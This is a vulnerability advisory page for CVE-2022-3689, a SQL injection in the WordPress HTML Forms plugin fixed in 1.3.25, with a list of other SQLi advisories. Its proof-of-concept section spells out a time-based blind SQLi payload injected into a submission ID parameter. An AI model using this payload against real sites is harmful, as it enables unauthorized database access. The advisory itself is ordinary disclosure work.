HTML Forms < 1.3.25 – Admin+ SQLi | CVE 2022-3689 | Plugin Vulnerabilities

Description

The plugin does not properly properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users

Proof of Concept

Access the submission page on https://example.com/wp-admin/admin.php?page=html-forms&view=edit&form_id=form_ID&tab=submissions

Capture the request after performing a Move to Trash action, replace the Submission ID with the SQLi payload, e.g

_hf_admin_action=bulk_delete_submissions&_wpnonce=nonce&id[]=1) AND (SELECT 2179 FROM (SELECT(SLEEP(5)))xaXr) AND (4033=4033

Affects Plugins

Fixed in 1.3.25

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Nguyen Duy Quoc Khanh

Submitter

Nguyen Duy Quoc Khanh

Submitter twitter

Verified

Yes

WPVDB ID

e9c551a3-7482-4421-8197-5886d028776c

Timeline

Publicly Published

2022-11-07 (about 1 years ago)

Added

2022-11-07 (about 1 years ago)

Last Updated

2022-11-07 (about 1 years ago)

Other

Published

Title

Published

2023-10-03

Title

Post SMTP < 2.6.1 - Authenticated (Administrator+) SQL Injection

Published

2015-06-08

Title

Newstatpress < 1.0.1 - SQL Injection

Published

2024-03-21

Title

Network Summary <= 2.0.11 - Unauthenticated SQL Injection

Published

2023-11-03

Title

RSVPMarker < 10.6.7 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Published

2014-08-01

Title

GD Star Rating 1.9.22 - SQL Injection